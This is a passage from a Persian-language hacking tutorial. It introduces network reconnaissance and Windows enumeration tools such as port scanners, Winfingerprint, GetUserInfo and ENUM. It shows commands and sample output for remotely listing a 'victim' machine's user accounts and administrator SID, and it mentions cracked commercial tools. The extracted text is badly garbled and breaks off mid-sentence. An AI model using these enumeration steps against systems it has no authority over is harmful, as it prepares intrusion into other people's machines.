ﺁﺧ ﺮی اﻃﻼﻋ ﺎﺕﯽ در ﺏ ﺎرﻩ ‪NetBIOS‬‬ ‫ﮐﺎﻣﭙﻴﻮﺕﺮ ﺏﻪ ﺷﻤﺎ ﻣﯽ دهﺪ ‪.‬ﮐﻪ اﻟﺒﺘﻪ ﺷﻤﺎ هﻤﮕﯽ ایﻨﻬﺎ را ﻣﻴﺘﻮاﻧﻴﺪ دﺱﺖ ﮐﺎری ﮐﺮدﻩ و ﺏ ﻪ دﻟﺨ ﻮاﻩ و ی ﺎ ﺏﻨ ﺎ ﺏ ﻪ اﺡﺘﻴ ﺎج ﺧ ﻮد ﭘﻴﮑ ﺮ ﺏﻨ ﺪی ﮐﻨﻴ ﺪ ‪ .‬ﺏ ﺎ ﮐﻠﻴ ﺪ‬ ‫‪ Launcher‬ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﭘﺮوﺕﮑﻞ اﻧﺘﺨﺎﺏﯽ ﺧﻮد ﺏﻪ هﺪف ﺧﻮد وﺻﻞ ﺷﻮیﺪ ‪.‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ‪ ٣‬ﺕﺎ اﻣﮑﺎن ﻓﻮق ﺟﺬاب دارد ) زیﺎد ﺟﺪی ﻧﮕﻴﺮیﺪ ( ﺏﺎ ﻋﻨﻮان هﺎی ‪ Port Probe‬ﮐﻪ از ﻧﺴﺨﻪ ‪ ۵‬ﺏﻪ ﺏﻌﺪ ﻧﻴﺴﺖ و ‪ Port Scan‬و ‪TCP‬‬ ‫‪. TERM‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٨‬‬

‫ﮔﺰیﻨﻪ دیﮕﺮی ﺏﺎ ﻧﺎم ‪ Net Scanner‬دارد ﮐﻪ اﻟﺒﺘﻪ ﻣﺜﻞ دو ﻧ ﺮم اﻓ ﺰار ﻗﺒﻠ ﯽ ﺏ ﺮای ﭘﻴ ﺪا ﮐ ﺮدن ﻣﺎﺷ ﻴﻦ ه ﺎی ﻓﻌ ﺎل در ی ﮏ رﻧ ﺞ ﻣ ﺸﺨﺺ ‪ IP‬اﺱ ﺖ‪.‬‬ ‫ﮔﺰیﻨﻪ ‪ Port Scanner‬ﺏﺮای ﺟﺴﺘﺠﻮ ﮐﺮدن ﭘﻮرت هﺎی ﺏ ﺎز روی ﻣﺎﺷ ﻴﻦ ﻗﺮﺏ ﺎﻧﯽ اﺱ ﺖ اﻟﺒﺘ ﻪ دارای ﮐ ﺎرایﯽ ﺧ ﻮﺏﯽ اﺱ ﺖ ﺏﻌ ﺪ از ‪ nmap‬ﻣﻴ ﺸﻮد‬ ‫ﮔﻔﺖ ﺏﻬﺘﺮیﻦ هﺴﺖ یﺎ ﻻاﻗﻞ ﺟﺰو ﺏﻬﺘﺮیﻦ هﺎ اﺱﺖ‪ .‬ﻧﺘﺎیﺠﯽ را ﮐﻪ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ﺏﺎ یﮏ ﻧﻤﺎد ﮐﻨﺎرش اﺱﺖ اﮔﺮ دای ﺮﻩ ﺱ ﺒﺰ ﻧ ﺸﺎن داد یﻌﻨ ﯽ ﭘ ﻮرت ﺏ ﺎز‬ ‫اﺱﺖ اﮔﺮ دایﺮﻩ ﺱﺒﺰ ﺏﺎ یﮏ ﺡﺮف ‪ b‬در داﺧﻞ ﺁن ﻧﺸﺎن داد یﻌﻨﯽ ﭘﻮرت ﺏﺎز اﺱﺖ و اﻃﻼﻋﺎﺕﯽ از ﺱﺮویﺲ ﺏﺎز ﮐﻨﻨﺪﻩ ﭘﻮرت را هﻢ ﮐ ﺸﻒ ﮐ ﺮدﻩ ﺏﻘﻴ ﻪ‬ ‫ﻧﻤﺎد هﺎ هﻢ یﻌﻨﯽ ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ یﺎ ایﻨﮑﻪ دیﻮار ﺁﺕﺶ از دﺱﺘﺮﺱﯽ ﺏﻪ ﺁن ﺟﻠﻮ ﮔﻴﺮی ﮐﺮدﻩ اﺱﺖ ‪.‬‬ ‫ﮔﺰیﻨﻪ ﺏﻌﺪی ‪ TCP TERM‬اﺱﺖ ﮐﻪ ﺏﺎ ﺁن ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ یﮏ ﭘﻮرت ﺧﺎص وﺻﻞ ﺷﺪﻩ و ﻓﻌﻞ اﻧﻔﻌﺎل داﺷ ﺘﻪ ﺏﺎﺷ ﻴﺪ ﮐ ﻪ ﺧﻴﻠ ﯽ ﺧ ﻮب اﺱ ﺖ اﻟﺒﺘ ﻪ ‪ NC‬و‬ ‫‪ Telnet‬هﻢ ایﻦ ﮐﺎر هﺎ را ﻣﻴﮑﻨﻨﺪ ‪.‬‬ ‫‪: WS-Ping Pro Pack -۴‬‬

‫ایﻦ هﻢ ﻣﺜﻞ ‪ ٣‬ﻧﺮم اﻓﺰار ﻗﺒﻠﯽ ﮐﺎرایﯽ یﮏ ﺱﺎﻧﯽ دارد ﺕﺠﺎری اﺱﺖ اﻣﺎ ﻣﺜﻞ ﻗﺒﻠﯽ هﺎ ﮐﺮک زیﺎد دارد روی ﺕﻤﺎﻣﯽ ﻧ ﺴﺦ ویﻨ ﺪوز اﺟ ﺮا ﻣﻴ ﺸﻮد دارای‬ ‫ﮔﺰیﻨﻪ هﺎی زیﺮ اﺱﺖ ‪:‬‬ ‫‪ : Info‬اﻃﻼﻋﺎت ﻣﻘﺪﻣﺎﺕﯽ در ﺏﺎرﻩ هﺪف ﺏﺪﺱﺖ ﻣﻴﺂورد از ﻗﺒﻴﻞ ‪ Whois‬و ‪ DNS‬و‪ ...‬اﻟﺒﺘﻪ اﮔﺮ ﻧﺎم را ﻣﻴﻨﻮیﺴﻴﺪ ﺏﺎی ﺪ ﮐﺎﻣ ﻞ ﺏﺎﺷ ﺪ یﻌﻨ ﯽ ﻧ ﺎم ﮐﺎﻣ ﻞ‬ ‫ﻣﺎﺷﻴﻦ ﺏﺎﺷﺪ ‪ .‬ﻧﻪ ﻣﺜﻼ ‪ WWW.xxx.com‬ﻧﻨﻮیﺴﻴﺪ ﭼﻮن یﮑﻢ ﻣﺸﮑﻞ ﭘﻴﺶ ﻣﯽ ﺁیﺪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﺁدرس ‪ IP‬را وارد ﮐﻨﻴﺪ‪.‬‬ ‫‪ : HTML‬ﻣﺜﻞ ﮔﺰیﻨﻪ هﺎی ﻣﺸﺎﺏﻪ ﺧﻮد ) ﮔﺰیﻨﻪ ‪ Web Browser‬در ﻧﺮم اﻓ ﺰار ‪ SAM SPADE‬و ﮔﺰیﻨ ﻪ ‪ HTML‬در ﻧ ﺮم اﻓ ﺰار ‪net info‬‬ ‫( در دو ﻧ ﺮم اﻓ ﺰار ﺏ ﺎﻻی اﺱ ﺖ‪ Ping.‬و ‪ Trace Route‬و ‪ Look up‬و‪ ...‬ﮐ ﺎﻣﻼ ﻣﺜ ﻞ و ﻣ ﺸﺎﺏﻪ ﻧ ﺮم اﻓ ﺰار ه ﺎیﯽ ﺏ ﺎﻻیﯽ اﺱ ﺖ ﮐ ﻪ ﺕﻮﺽ ﻴﺢ ﺁﻧﻬ ﺎ‬ ‫ﺻﺮف ﻧﻈﺮ ﻣﻴﮑﻨﻢ‪.‬‬ ‫ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل یﮏ ﺱﺮی ﻧﺮم اﻓﺰار ﺷﻨﺎﺱﺎیﯽ ﻣﻘﺪﻣﺎﺕﯽ هﺪف را ﻣﻌﺮﻓﯽ ﮐﺮدم از ایﻦ ﺟﺎ ﺏﻪ ﺏﻌﺪ ﻣﻦ یﮏ ﺱﺮی ﻧ ﺮم اﻓ ﺰار ﻣﻌﺮﻓ ﯽ ﻣﻴﮑ ﻨﻢ ﺕ ﻮ هﻤ ﻴﻦ‬ ‫ﻣﺎیﻪ هﺎ !!‬ ‫‪: Rhino 9 Pinger‬‬ ‫یﮏ ﻧﺮم اﻓﺰار ﺏﺮای ﺕﺸﺨﻴﺺ ﺏﺎﻻ ﺏﻮدن ﻣﺎﺷﻴﻨﻬﺎی درون ﺷﺒﮑﻪ ﺏﺎ دادن یﮏ رﻧﺞ ‪ IP‬اﺱﺖ ‪.‬دارای ﺱﺮﻋﺖ و دﻗﺖ زیﺎدی اﺱﺖ‪.‬‬ ‫‪: Visual Route‬‬ ‫یﮏ ﻧﺮم اﻓﺰار ‪ Trace route‬اﺱﺖ ﮐﻪ ﮔﻔﺘﻢ ﭼﻪ ﮐﺎر ﻣﻴﮑﻨﻨﺪ ایﻦ ﻧﻮع ﻧﺮم اﻓﺰار ه ﺎ ای ﻦ یﮑ ﯽ ‪ ،‬ی ﮏ ﻣﺤ ﻴﻂ ﮔﺮاﻓﻴﮑ ﯽ دارد ﮐ ﻪ ﻣﻮﻗﻌﻴ ﺖ ﺕﻘﺮیﺒ ﯽ از‬ ‫ﻣﮑ ﺎن ﻣﺎﺷ ﻴﻦ ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ ﻣ ﺜﻼ ﮐ ﺸﻮر و ﺷ ﻬﺮ‪.‬ﺁﺧ ﺮیﻦ ﻧ ﺴﺨﻪ اش ﻓﮑ ﺮ ﻣﻴﮑ ﻨﻢ ﻧ ﺴﺨﻪ ‪ ١٠‬ﺏﺎﺷ ﺪ ﮐ ﻪ ای ﻦ ﺷ ﮑﻠﯽ از ﺱ ﺎیﺖ ﺧ ﻮدش ﺏ ﺎ ﻧ ﺎم‬ ‫‪ www.visualroute.com‬ﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﻴﺮد ‪ .‬یﮏ ﺱﺮی ﻧﺮم اﻓﺰارهﺎی دیﮕﺮی هﻢ دارد ﮐﻪ اﮔﺮ ﺧﻮاﺱﺘﻴﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﻴﺮیﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٩‬‬

‫اﻟﺒﺘﻪ ایﻦ ﻧﺴﺨﻪ ‪ 9.2a‬اﺱﺖ ﺏﺮای ‪ ١۵‬روز اول رایﮕﺎن اﺱﺖ‪.‬‬ ‫اﺏﺰارهﺎ ی ﺷﺮﮐﺖ ‪: Necrosoft‬‬ ‫ﮐﻪ در ﻣﻮرد ‪ Whois‬و ‪ DNS‬و ‪ Trace route‬اﺱﺖ و ﺏﺴﻴﺎر ﺱﺎدﻩ و اﻟﺒﺘﻪ ﺏﺎ ﮐﺎرای ﺏﺎﻻ اﺱ ﺖ ﮐ ﻪ از ﺱ ﺎیﺖ ﺧ ﻮدش ﺏ ﺎ ﻧ ﺎم ‪www.nscan.org‬‬ ‫ﻣﻴﺘﻮاﻧﻴﺪ دریﺎﻓﺖ ﮐﻨﻴﺪ‪.‬‬

‫اﺏﺰار ‪: Win finger print‬‬ ‫یﮏ اﺏﺰار هﻤﻪ ﮐﺎرﻩ دیﮕﺮ ﮐﻪ ﺏﻪ ﺷﺪت در ﺡﺎل ﺕﻮﺱﻌﻪ اﺱﺖ اﺏﺰار ‪ Win finger print‬اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ یﮏ اﺏﺰار ﻣﺘﻦ ﺏﺎز یﺎ ﺏﻪ اﺻ ﻄﻼﺡﯽ ‪open‬‬ ‫‪ Sours‬اﺱﺖ ﮐﻪ ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺁن را ‪.‬اﻟﺒﺘﻪ ایﻦ در اول ﺏﺮای ‪ Linux‬ﺏﻮد وﻟﯽ ﺏﻌﺪا ﻧﺴﺨﻪ ویﻨﺪوز ﺁن ﺁﻣﺪ ﮐﻪ ﺟﺎﻟﺐ اﺱﺖ اﻟﺒﺘﻪ ﻣﯽ ﺕﻮاﻧﻴﺪ ﮐ ﺪ‬ ‫ﻣﻨﺒﻊ ﺁن را ﺧﻮدﺕﺎن ویﺮایﺶ ﮐﺮدﻩ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻧﻴﺎزﺕﺎن ﺏﻌﺪ ﺁن را ﮐﺎﻣﭙﺎیﻞ ﮐﻨﻴﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٠‬‬

‫یﮏ ﭼﻴﺰ اول از هﻤﻪ ﺏﮕﻮیﻢ ﮐﻪ راﺏﻂ ﮐﺎرﺏﺮی ایﻦ ﺏﺮﻧﺎﻣﻪ ﻓﻘﻂ ‪ %٣۵‬از اﻣﮑﺎﻧﺎت ایﻦ ﺏﺮﻧﺎﻣﻪ را در اﺧﺘﻴﺎر ﺷﻤﺎ ﻣﻴﮕﺰارد‪.‬‬ ‫ایﻦ ﻧﺮم اﻓﺰار دارای یﮏ راﺏﻂ ﮐﺎرﺏﺮی ﻣﯽ ﺏﺎﺷﺪ ﮐﻪ ﻗﺴﻤﺖ ‪ Enumeration Option‬ﻓﻘﻂ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﭼ ﻮن ﮔﺰیﻨ ﻪ ه ﺎی دیﮕ ﺮ ﺁن ﺕ ﺎﺏﻠﻮ اﺱ ﺖ‬ ‫ﮐﺎرﺷﺎن !!! ﮔﺰیﻨﻪ اول ﮐﻪ ﻣﻌﻨﯽ واﺽﺢ ایﯽ دارد و ﺕﻤﺎم اﻣﮑﺎﻧﺎﺕﯽ را ﮐﻪ ﮔﺰیﻨﻪ ﺁن را هﻢ در ای ﻦ ﭘﻨﺠ ﺮﻩ وﺟ ﺪ ﻧ ﺪارد ه ﻢ ﺕ ﺴﺖ ﻣﻴﮑﻨ ﺪ وﻟ ﯽ ﮐﻨﺘﺮﻟ ﯽ‬ ‫روی ﺁﻧﻬﺎ ﻧﺪاریﺪ ﭘﺲ هﻴﭽﯽ !! وﻟﯽ ﺏﺪ ﻧﻴﺴﺖ ؟!؟!؟!؟ ﮔﺰیﻨﻪ ‪ Shares‬دﻧﺒﺎل ﭼﻴﺰهﺎی ﺏﻪ اﺷﺘﺮاک ﮔﺬاﺷﺘﻪ ﺷﺪﻩ روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ ﻣﻴﮕﺮدد اﻟﺒﺘﻪ ﺏﺎیﺪ‬ ‫یﮑﯽ از ﭘﻮرت هﺎی ‪ ۴۴۵‬و یﺎ ‪ ١٣٩‬ﺏﺎز ﺏﺎﺷﺪ ﺕﺎ ﻧﺘﻴﺠﻪ ای داﺷﺘﻪ ﺏﺎﺷﺪ‪ .‬یﮑﯽ از اﻣﮑﺎﻧﺎﺕﯽ ﮐﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ دارد و اﺕﻔﺎﻗﺎ ه ﻢ ﮐ ﺎرایﯽ ﺧ ﻮﺏﯽ دارد ﮔﺰیﻨ ﻪ‬ ‫‪ Role‬اﺱﺖ ﮐﻪ ﮐﺎرش ﺕﺸﺨﻴﺺ ﻧﻮع ﺱﺮور و ﺱﻴﺴﺘﻢ ﻋﺎﻣ ﻞ روی ﺁن ﺏ ﻪ هﻤ ﺮاﻩ ﺟﺰﺋﻴ ﺎت ﺧﻴﻠ ﯽ ﺧ ﻮب اﺱ ﺖ ﮐ ﻪ ﻣﺘﺎﺱ ﻔﺎﻧﻪ ﮔﺰیﻨ ﻪ ﺁن در ﻧ ﺴﺨﻪ ه ﺎی‬ ‫ﺟﺪیﺪ ﺡﺬف ﺷﺪﻩ و ﺷﻤﺎ ﺏﺎیﺪ ﺁن را از ﺧﻂ ﻓﺮﻣﺎن ﺏﻌﻼوﻩ ﺱﻮیﭻ ایﻦ ﮔﺰیﻨﻪ اﺟﺮا ﮐﻨﻴﺪ یﺎ ﮔﺰیﻨﻪ ‪ All‬را اﻧﺘﺨﺎب ﮐﻨﻴﺪ‪.‬اﻣﮑﺎن دیﮕﺮ ‪ User‬در ﻧﺴﺨﻪ هﺎی‬ ‫ﺟﺪیﺪ و در ﻧﺴﺨﻪ هﺎی ﻗ ﺪیﻢ ‪ USER NAME‬اﺱ ﺖ ﮐ ﻪ ای ﻦ ﮔﺰیﻨ ﻪ ﺷﻨﺎﺱ ﻪ ﺱﻴ ﺴﺘﻤﯽ )‪ (SID‬ه ﺮ ی ﮏ از ﮐ ﺎرﺏﺮان ﺱﻴ ﺴﺘﻢ را ﮐ ﺸﻒ ﮐ ﺮدﻩ و ﺷ ﻤﺎ‬ ‫ﻣﻴﺘﻮاﻧﻴﺪ ﺷﻨﺎﺱﻪ ﻣﺪیﺮ ﺱﻴﺴﺘﻢ ) ‪ ( SID=500‬را ﭘﻴﺪا ﮐﻨﻴﺪ‪ .‬ﮔﺰیﻨﻪ دیﮕ ﺮی ﮐ ﻪ ﻣ ﻮرد ﺏﺮﺱ ﯽ ﻗ ﺮار ﻣﻴ ﺪهﻢ ﮔﺰیﻨ ﻪ ‪ Services‬اﺱ ﺖ ﮐ ﻪ ﺕﻤ ﺎم ﺱ ﺮویﺲ‬ ‫هﺎی ﻓﻌﺎل ﺏﻌﻼوﻩ ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار را ﺏﻪ ﻣﺎ ﻣﯽ ﮔﻮیﺪ ‪.‬ﮔﺰیﻨﻪ ﺏﻌﺪی ﮔﺰیﻨﻪ ‪ Sessions‬اﺱﺖ ﮐﻪ ﮐﺎر ایﻦ ﮔﺰیﻨﻪ ایﻦ اﺱﺖ ﮐﻪ ﺏﻪ ﻣ ﺎ ﻟﻴ ﺴﺘﯽ از اﺱ ﺎﻣﯽ‬ ‫‪ NetBIOS‬ﺱﺎیﺮ ﺱﻴﺴﺘﻢ هﺎیﯽ ﻣﻮﺟﻮد را ﮐﻪ ﺏﻪ ﺱﻴﺴﺘﻢ ﻣﻘﺼﺪ ﻣﺘﺼﻞ اﺱﺖ ﺏﻪ ﻣﺎ ﻣﻴﺪه ﺪ‪ .‬ﮔﺰیﻨ ﻪ ﺏﻌ ﺪی ‪ Registry‬اﺱ ﺖ ﮐ ﻪ ی ﮏ ﭘ ﺮس ﺟ ﻮ درﺏ ﺎرﻩ‬ ‫ایﻦ ﮐﻪ اﺟﺎزﻩ دﺱﺖ رﺱﯽ از راﻩ دور ﺏﻪ ‪ Registry‬را ﻣﻴﺪهﺪ یﺎ ﻧﻪ و یﮑﺴﺮی ﺧﻮرد ریﺰ دیﮕﻪ‪.‬ﺧﻮب ﮔﺰیﻨﻪ هﺎی ﻣﻬﻢ ایﻦ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺕﺠﺮﺏﻪ ای ﮐﻪ‬ ‫دارم ﺏﻪ ﺷﻤﺎهﺎ ﮔﻔﺘﻢ ﺏﻘﻴﻪ اش ﺏﺎ ﺧﻮدﺕﺎن راﺱﺘﯽ ﺡﺘﻤﺎ ایﻦ ﺕﺤﺖ ﺧﻂ ﻓﺮﻣﺎن اﺟﺮا ﮐﻨﻴﺪ و یﮏ زرﻩ ای ﺏﺎ ﺁن ﺏ ﺎزی ﮐﻨﻴ ﺪ ﺏﺒﻴﻨﻴ ﺪ ﺏ ﺪرد ﺕ ﺎن ﻣ ﯽ ﺧ ﻮرد ی ﺎ‬ ‫ﻧﻪ!!‬ ‫اﺏﺰار ‪: joeware‬‬ ‫اﺏﺰار دیﮕﺮی ﮐﻪ ﺏﺮای ویﻨﺪوز ﻣﻴﺘﻮان ﻣﻌﺮﻓﯽ ﮐﺮد ﺏﻪ ﻣﺠﻤﻮﻋﻪ اﺏﺰار ‪ joeware‬ﮐﻪ ﺕﻮﺱﻂ ﺁﻗﺎی ‪ Joe Richards‬ﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ اﺷﺎرﻩ ﮐﺮد‪ .‬ﮐﻪ ﻣ ﻦ‬ ‫یﮑﯽ از ایﻦ اﺏﺰار هﺎ را زیﺎد اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﻢ ﺏﻪ ﻧﺎم ‪ Get User Info‬اﻟﺒﺘﻪ ایﻦ ﻣﺠﻤﻮﻋ ﻪ ‪ ،‬اﺏﺰاره ﺎی ﺏﻴ ﺸﺘﺮی ه ﻢ دارد ﮐ ﻪ ﺧ ﻮب اﺱ ﺖ وﻟ ﯽ ای ﻦ‬ ‫یﮑﯽ را دوﺱﺖ دارم ﭼﻮن ﮐﺎر راﻩ ﻣﯽ اﻧﺪازد ﺏﺮای ﻣﻦ ‪ ،‬ﮐﻪ ﺏﻪ ﺷﻤﺎ هﺎ هﻢ ﻣﻴﮕﻮیﻢ ﮐﻪ ﺷﺎیﺪ ﺏﻪ درد ﺷﻤﺎهﺎ هﻢ ﺏﺨﻮرد‪.‬‬ ‫ای ﻦ اﺏ ﺰار ﺧﺮوﺟ ﯽ ﺡﺎﺻ ﻞ از اﺟ ﺮای ﺁن ﺏ ﺴﻴﺎر ﺷ ﺒﻴﻪ ﻓﺮﻣ ﺎن ‪ Net user‬ﺧ ﻮد ویﻨ ﺪوز ﮐ ﻪ اﮔ ﺮ دوام ﺁوردم ﺏ ﺮای ﺷ ﻤﺎهﺎ ای ﻦ ﻓﺮﻣﺎﻧﻬ ﺎی ‪ net‬را‬ ‫ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪ ،‬وﻟﯽ یﮏ ﺱﺮی ﺕﻔﺎوﺕﻬﺎی اﺱﺎﺱﯽ دارد ﮐﻪ ایﻦ اﺏﺰار را ‪ ،‬از ﺏﻘﻴﻪ ﻣﺘﻤﺎیﺰ ﻣﻴﮑﻨﺪ‪ .‬ﺏﺒﻴﻨﻴﻢ ﮐﻪ ﺏﻌﺪ از اﺟﺮای ایﻦ ﻧﺮم اﻓﺰار ﺏﺎ ﻧﺎم ﮐ ﺎرﺏﺮ‬ ‫‪ Administrator‬ﭼﻪ ﺟﻮاﺏﯽ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ‪.‬‬ ‫‪C: \> getuserinfo.exe administrator‬‬ ‫)‪Getuserlnfo V02.05.O0cpp Joe Richards ([email protected]‬‬ ‫‪January 2002‬‬ ‫‪User information for [Local]\administrator‬‬ ‫‪User Name‬‬ ‫‪Administrator‬‬ ‫‪Full Name‬‬ ‫‪Description‬‬ ‫‪Built-in account for‬‬ ‫‪administrating‬‬ ‫‪the Computer/domain‬‬ ‫‪Users Comment‬‬ ‫‪User Type‬‬ ‫‪Admin‬‬ ‫‪Enhanced Authority‬‬ ‫‪Account Type‬‬ ‫‪Global‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢١‬‬

‫‪Workstations‬‬ ‫‪Home Directory‬‬ ‫‪L User Profile‬‬ ‫‪Logon Script‬‬ ‫‪Flags‬‬ ‫‪NO_PWD_EXPIRE‬‬ ‫‪Account Expires‬‬ ‫‪Never‬‬ ‫‪Password age in days‬‬ ‫‪249‬‬ ‫‪Password last set‬‬ ‫‪7/6/2001 3:22 PM‬‬ ‫‪Bad PWD count‬‬ ‫‪0‬‬ ‫)‪Num logons (this machine‬‬ ‫‪2432‬‬ ‫‪Last logon‬‬ ‫‪3/12/2002 8:24 PM‬‬ ‫‪Logon hours‬‬ ‫‪All‬‬ ‫‪Global group memberships‬‬ ‫‪*None‬‬ ‫‪Local group memberships‬‬ ‫‪*Administrators‬‬ ‫‪Completed .‬‬

‫ﺕﻔﺎوﺕﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ را ﺏﺎ ‪ Net user‬را ﺏﺎ ﺧﻂ زرد ﻧﺸﺎن دادﻩ ام ‪.‬اﻃﻼﻋ ﺎت ﺏ ﺎ ﻗﻴﻤﺘ ﯽ در ﺏ ﺎرﻩ ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﺏﺪﺱ ﺖ ﺁوردﻩ اﺱ ﺖ ﮐ ﻪ در ﻓﻴﻠ ﺪ ه ﺎی‬ ‫‪ Password age in days‬و ‪ Bad PWD count‬و )‪ Num logons (this machine‬ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ﮐﻪ ﮐﺎر ﻣ ﺎ را ﺏ ﺮای ﺕﺠﺰی ﻪ و ﺕﺤﻠﻴ ﻞ و‪...‬‬ ‫راﺡﺖ ﻣﻴﮑﻨﺪ ‪ .‬ﻓﻴﻠﺪ ‪ Bad PWD count‬را ﻣﻴﺘﻮان ﮔﻔﺖ ﮐﻪ ﻧﺸﺎﻧﻪ ای از ﺕﻼش ﺏﺮای دﺱ ﺘﻴﺎﺏﯽ ﺏ ﻪ ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﻓ ﺮض ﮐ ﺮد و ﻣﻘ ﺪار ای ﻦ ﻣﻮﻋ ﺪ ﻗﻔ ﻞ‬ ‫ﺷﺪن ﺡﺴﺎب را ﺏﻮاﺱﻄﻪ اﺱﺮار در ﺏﮑﺎرﮔﻴﺮی ﮐﻠﻤﺎت اﺷ ﺘﺒﺎﻩ را ﻧ ﺸﺎن ﻣﻴﺪه ﺪ‪ .‬ﻓﻴﻠ ﺪ ‪ Password age in days‬زﻣ ﺎن ﺕﻐﻴﻴ ﺮ ﻧﮑ ﺮدن ﭘ ﺴﻮرد را ﺏ ﺮ‬ ‫ﺡﺴﺐ روز ﻧﺸﺎن ﻣﻴﺪهﺪ ‪ .‬ﻓﻴﻠﺪ ‪ Num logons‬ﺕﻌﺪاد دﻓﻌﺎت وارد ﺷﺪن ﺏﻪ ﻣﺎﺷﻴﻦ ﺕﻮﺱﻂ ایﻦ ﺡﺴﺎب را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬ﺏﺮای دیﺪن ﻧﺎم ﺕﻤﺎم ﮐﺎرﺏﺮان ﺏ ﺎ‬ ‫ایﻦ ﻧﺮم اﻓﺰار از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ‪:‬‬ ‫‪C:\>Getuserinfo.exe \.‬‬ ‫اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﮐﻪ ﻣﺜﻼ ﺟﻮاب ﻣﻴﮕﻴﺮیﻢ‪:‬‬ ‫‪C:\>Getuserinfo.exe \.‬‬ ‫)‪Getuserlnfo V02.05.O0cpp Joe Richards ([email protected]‬‬ ‫‪January 2002‬‬

‫]‪User Accounts For [Local‬‬ ‫‪-----------------------------------------------------------------------------------------------------------------‬‬‫‪Administrator‬‬ ‫‪Orc‬‬ ‫‪Skycladgirl‬‬ ‫‪Test‬‬ ‫__‪__Vmware_user‬‬ ‫ﺧﻮب ایﻦ را ذﮐﺮ ﮐﻨﻢ ﮐﻪ ایﻦ اﺏﺰار هﻢ ‪ Local‬اﺱﺖ هﻢ ‪ Remote‬ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ‪:‬‬ ‫‪C:\> Getuserlnfo.exe \\ x.x.x.x\.‬‬ ‫‪C:\> Getuserlnfo.exe domain \\x.x.x.x\.‬‬ ‫ﺧﻮب ایﻦ دوﺕﺎ ﻟﻴﺴﺖ ﮐﺎرﺏﺮ هﺎی ‪ IP‬ﻣﻮرد ﻧﻈﺮ ﻣﺎ را ﻧﺸﺎن ﻣﻴﺪهﺪ ) ﺏﻪ ﺟﺎی ‪ x.x.x.x‬ﺷﻤﺎرﻩ ‪ IP‬هﺪف ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﺏﻨﻮیﺴﻴﺪ( ‪.‬‬ ‫اﻟﺒﺘﻪ ﺏﻌﺪ از ﺏﺪﺱﺖ ﺁوردن ﻟﻴﺴﺖ ﮐﺎرﺏﺮان ﻣﻴﺘﻮاﻧﻴﺪ اﺱﻢ ﺁن ﮐﺎرﺏﺮ را ﺏﻪ ﺟﺎی ) ‪ ( .‬ﺏﻨﻮیﺴﻴﺪ و اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ را ﺏﮕﻴﺮیﺪ‪.‬‬ ‫اﺏﺰار ‪: ENUM‬‬ ‫اﺏﺰار دیﮕﺮی ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﮐﻪ اﻟﺒﺘﻪ دارای ﻗﺎﺏﻠﻴﺘﻬﺎی ﺧﻮﺏﯽ ﻧﻴﺰ هﻢ هﺴﺖ ‪ ENUM‬اﺱﺖ ‪.‬‬ ‫ایﻦ اﺏﺰار از ﻧﻮع ﮐﺪ ﺏﺎز ﺏﻮدﻩ و ﮐﺪ هﺎی ﺁن در دﺱﺘﺮس هﻤﮕﺎن اﺱﺖ ﭘﺲ اﮔﺮ ﻧﻴﺎزی ﺏﻪ ﺕﻐﻴﺮات داﺷﺘﻴﺪ دﺱﺖ ﺷﻤﺎ ﺏﺎز اﺱﺖ ‪.‬ﻣﺜ ﻞ ﺏﻴ ﺸﺘﺮ ﻧ ﺮم اﻓ ﺰار‬ ‫هﺎی ﺧﻔﻦ ﮐﺪ هﺎی ﺁن ﺏﺮ ﭘﺎیﻪ ‪ 